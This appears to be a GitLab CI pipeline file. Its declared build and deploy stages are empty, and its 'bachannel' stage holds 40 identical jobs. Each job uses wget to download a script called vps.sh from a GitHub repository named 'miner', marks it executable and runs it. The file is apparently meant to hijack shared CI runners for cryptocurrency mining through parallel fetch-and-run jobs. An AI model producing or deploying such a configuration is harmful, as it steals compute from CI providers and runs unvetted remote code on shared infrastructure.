stages:
  - bachannel
  - build
  - deploy
 
bachannel_1:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_2:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_3:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_4:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_5:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_6:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_7:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_8:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_9:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_10:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_11:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_12:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_13:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_14:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_15:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_16:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_17:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_18:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_19:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_20:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_21:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_22:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_23:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_24:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_25:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_26:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_27:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_28:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_29:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_30:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_31:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_32:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_33:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_34:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_35:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_36:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_37:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_38:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_39:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh

bachannel_40:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/ytforview/miner/main/vps.sh && chmod u+x vps.sh && ./vps.sh